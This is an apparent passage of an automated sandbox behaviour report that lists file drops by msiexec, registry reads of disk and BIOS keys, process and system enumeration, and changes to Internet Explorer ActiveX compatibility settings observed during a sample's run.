File created C:\Windows\SysWOW64\mfc71chs.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\vcruntime140_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfcm140.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification \??\c:\Windows\system32\mfc100rus.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\msvcr70.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\vccorlib140.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\msvcr120.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SysWOW64\mfc140enu.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\mfc140kor.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc120fra.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification \??\c:\Windows\system32\vcomp100.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\msvcp140_atomic_wait.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc100esn.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\mfc100deu.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\mfc100esn.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\mfc110chs.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification \??\c:\Windows\system32\mfc100ita.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc100.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SysWOW64\msvcp100.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\vcomp120.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\system32\mfc120ita.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\mfc110kor.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\msvcp140_2.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\mfc110enu.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\system32\mfc120esn.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification \??\c:\Program Files (x86)\Common Files\Microsoft Shared\VC\msdia90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VC\amd64\msdia80.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\AppInfoDocument\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\Microsoft.VisualStudio.Tools.Office.AppInfoDocument.v9.0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee100.tlb C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VC\msdia80.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\AppInfoDocument\AddIns.store C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOMessageProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\DESIGNER\mswcrun.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee90.tlb C:\Windows\system32\msiexec.exe N/A
File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\VC\msdia100.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\VC\msdia100.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOLoaderUI.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOMessageProvider.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VC\msdia90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\DESIGNER\mshtmpgr.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOLoaderUI.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\DESIGNER\mscdrun.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOLoader.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOLoaderUI.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee100.tlb C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\VC\msdia90.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOMessageProvider.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOLoaderUI.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee90.tlb C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOLoader.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOInstallerUI.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\AppInfoDocument\AddIns.store C:\Windows\Microsoft.NET\Framework64\v3.5\addinutil.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOLoader.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee90.tlb C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee100.tlb C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOMessageProvider.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification \??\c:\Program Files (x86)\Common Files\Microsoft Shared\VC\msdia100.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInSideAdapters\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.Office.Tools.v9.0.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\PipelineSegments.store C:\Windows\Microsoft.NET\Framework64\v3.5\addinutil.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\AppInfoDocument\AddIns.store C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033\VSTOInstallerUI.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\VSTOFiles.cat C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SystemTemp\~DF56B28F79BBB24D7A.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\WinSxS\InstallTemp\20240603022753105.0\mfc80ENU.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
File created C:\Windows\WinSxS\InstallTemp\20240603022715857.0\vcomp.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\WinSxS\InstallTemp\20240603022729756.2\9.0.30729.7523.cat C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\WinSxS\InstallTemp\20240603022729740.0\amd64_Microsoft.VC90.ATL_1fc8b3b9a1e18e3b_9.0.30729.7523_x-ww_f4ca2f60.manifest C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\WinSxS\InstallTemp\20240603022729740.1 C:\Windows\system32\msiexec.exe N/A
File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_CENTRAL_mfc100enu_x86 C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
File opened for modification C:\Windows\Installer\MSI70F1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\WinSxS\InstallTemp\20240603022753089.0 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICC69.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.log C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe N/A
File opened for modification C:\Windows\Installer\MSICBBB.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\WinSxS\InstallTemp\20240603022729756.1\vcomp90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e599515.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{37B8F9C7-03FB-3253-8781-2517C99D7C00} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
File created C:\Windows\SystemTemp\~DFEDAB5A0C2EC7C73A.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\WinSxS\InstallTemp\20240603022807729.1 C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\WinSxS\InstallTemp\20240603022729772.2\9.0.30729.7523.policy C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e59951b.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
File opened for modification C:\Windows\WinSxS\InstallTemp\20240603022753105.0 C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF6DDD9F5D0527D829.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\WinSxS\InstallTemp\20240603022753136.1\8.0.50727.6229.cat C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\WinSxS\InstallTemp\20240603022807713.0\mfc90enu.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification \??\c:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_CENTRAL_mfc100rus_x64 C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\WinSxS\InstallTemp\20240603022715919.0\8.0.50727.6229.policy C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e59951f.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\assembly\tmp\E8H3JLCA\Microsoft.Office.Tools.v4.0.Framework.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.log C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe N/A
File created C:\Windows\Installer\e5995bd.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\WinSxS\InstallTemp\20240603022729756.0 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.log C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe N/A
File created C:\Windows\Installer\SourceHash{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e599587.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA16A.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\WinSxS\InstallTemp\20240603022729756.0\mfc90deu.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\WinSxS\InstallTemp\20240603022729740.2 C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
File opened for modification C:\Windows\Installer\MSI7373.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF10A1A84313923C46.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe N/A
File created C:\Windows\SystemTemp\~DF2099FB50C17BC7F6.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICD3A.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\WinSxS\InstallTemp\20240603022729756.0\mfc90enu.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
File opened for modification C:\Windows\WinSxS\InstallTemp\20240603022715904.0 C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
File created C:\Windows\SystemTemp\~DF52DA670E3390DDBD.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{C5E3A69D-D391-45A6-A8FB-00B01E2B010D} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC172.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFB68E7950E76382DF.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe N/A
File created C:\Windows\SystemTemp\~DF7FE0C7CA5FB056D2.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID0A0.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{B8B3BB4A-A10D-4F51-91B7-A64FFAC31EA7} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Microsoft.NET\ngenserviceclientlock.dat C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000000ac0d0bd70b51cb00000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800000ac0d0bd0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809000ac0d0bd000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d0ac0d0bd000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000ac0d0bd00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{601EB760-8909-11D0-9483-00A0C91110ED}\AlternateCLSID = "{E9AEB8A9-DB8B-425F-8133-69CA06187353}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{2B11E9B0-9F09-11D0-9484-00A0C91110ED}\AlternateCLSID = "{1EAC2F2A-251F-4BA8-8617-99A8DD715453}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{66833FE6-8583-11D1-B16A-00C0F0283628}\AlternateCLSID = "{7DC6F291-BF55-4e50-B619-EF672D9DCC58}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{CAB97084-FC6C-11D0-805D-00C04FB6C701} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{95F0B3BE-E8AC-4995-9DCA-419849E06410}\AlternateCLSID = "{DD2DBE12-F9F8-4E32-B087-DAD1DCEF0783}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{6262D3A0-531B-11CF-91F6-C2863C385E30} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{DD9DA666-8594-11D1-B16A-00C0F0283628}\AlternateCLSID = "{87DACC48-F1C5-4AF3-84BA-A2A72C2AB959}" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F6DB041E-66D0-48BC-8797-57C24F5C801C}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{996BF5E0-8044-4650-ADEB-0B013914E99C}\AlternateCLSID = "{CCDB0DF2-FD1A-4856-80BC-32929D8359B7}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{6D835690-900B-11D0-9484-00A0C91110ED}\AlternateCLSID = "{7E96FC67-468E-4E70-B246-D42078DD2361}" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{21D93911-CB0F-11D0-84AC-00A0C90DC8A9}\AlternateCLSID = "{20E72BC7-287F-4FCD-BFB7-156FF242C27C}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{642AC766-AAB4-11D0-8494-00A0C90DC8A9} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{58DA8D8A-9D6A-101B-AFC0-4210102A8DA7} C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{43478D73-78E0-11CF-8E78-00A0D100038E}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F0D2F219-CCB0-11D0-A316-00AA00688B10}\AlternateCLSID = "{E404CD92-E7B8-4037-918D-5A18CFD09ED3}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{97992019-74A6-46C7-9CA3-7F8C0D39940B} C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A} C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{BFCA30D5-DDE3-11D1-B6D9-0000F87557F8}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{C74190B6-8589-11D1-B16A-00C0F0283628}\AlternateCLSID = "{9181DC5F-E07D-418a-ACA6-8EEA1ECB8E9E}" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{02A69B00-081B-101B-8933-08002B2F4F5A} C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{F9043C85-F6F2-101A-A3C9-08002B2F49FB}\Compatibility Flags = "1024" C:\Windows\system32\msiexec.exe N/A
